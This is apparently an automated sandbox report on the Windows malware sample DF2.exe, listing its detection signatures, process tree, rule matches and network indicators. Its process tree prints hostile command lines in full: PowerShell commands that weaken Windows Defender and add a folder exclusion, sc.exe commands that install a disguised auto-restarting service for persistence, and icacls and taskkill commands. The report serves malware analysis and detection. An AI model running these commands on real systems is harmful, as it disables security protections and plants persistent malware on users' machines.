Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DF2.exe

Overview

General Information

Sample name:DF2.exe
Analysis ID:1583067
MD5:9b41d60958d07cdfd3cbc58fbb56cea7
SHA1:da86bea1b0de55fed13464a374e2f724ce38aee7
SHA256:7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
Tags:exeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • DF2.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\DF2.exe" MD5: 9B41D60958D07CDFD3CBC58FBB56CEA7)
  • DF2.exe (PID: 6696 cmdline: C:\Users\user\Desktop\DF2.exe MD5: 9B41D60958D07CDFD3CBC58FBB56CEA7)
    • cmd.exe (PID: 6840 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7032 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1740 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7012 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • w8m7wmyk939oczmkw4o2h16hs.exe (PID: 3068 cmdline: "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • nju2apmx83wqd9u7namsf59y.exe (PID: 7028 cmdline: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 3220 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5756 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6652 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7116 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7136 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5324 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 1508 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • main.exe (PID: 7100 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
    • WerFault.exe (PID: 6844 cmdline: C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6308 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5252 cmdline: C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • main.exe (PID: 6764 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5252, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7100, ProcessName: main.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7032, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe, ParentProcessId: 7028, ParentProcessName: nju2apmx83wqd9u7namsf59y.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6652, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 68.183.196.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7012, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe, ParentProcessId: 7028, ParentProcessName: nju2apmx83wqd9u7namsf59y.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6652, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7032, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6308, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://netdb.i2p2.no/Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/rAvira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/9Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org:443/i2pseeds.su3Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su3Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeAvira: detection malicious, Label: TR/AVI.Agent.jibab
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeReversingLabs: Detection: 57%
Source: C:\Windows\Temp\6KasAPG0ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\DiEI7oU1ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\yGODxgsjReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E16387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,21_2_00007FFE0E16387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,21_2_00007FFE0E1638C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE117738C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FFE117738C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1177387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FFE1177387F
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF764CC3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A901CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FF76A901CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE11504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11EC5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE11EC5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11776233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11776233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11BDB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11BDB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11EC4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11EC4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE126D5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE126D5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE132057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE132057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE133031F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]21_2_00007FF76A90737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]21_2_00007FFE0E16A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]21_2_00007FFE0EB47DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]21_2_00007FFE1150967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]21_2_00007FFE11ECA67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE1177A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE11BD7DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE11EC967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE126DA67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE1320293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FFE13309BBB

Networking

barindex
Source: global trafficTCP traffic: 5.181.20.93 ports 2,3,6,26893,8,9
Source: global trafficTCP traffic: 78.58.99.133 ports 1,2,4,6,29641,9
Source: global trafficTCP traffic: 95.164.4.146 ports 21309,0,1,2,3,9
Source: global trafficTCP traffic: 88.228.207.122 ports 16453,1,3,4,5,6
Source: global trafficTCP traffic: 89.35.131.34 ports 0,1,31750,3,5,7
Source: global trafficTCP traffic: 81.168.83.201 ports 18290,0,1,2,8,9
Source: global trafficTCP traffic: 173.68.123.78 ports 0,2,3,4,5,25043
Source: global trafficTCP traffic: 212.116.61.165 ports 24605,0,2,4,5,6
Source: global trafficTCP traffic: 38.40.94.251 ports 28976,2,6,7,8,9
Source: global trafficTCP traffic: 81.136.49.129 ports 0,2,3,6,8,28063
Source: global trafficTCP traffic: 68.149.143.121 ports 0,1,6,7,8,10687
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/6
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/b
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/s
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000015.00000002.2484200859.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
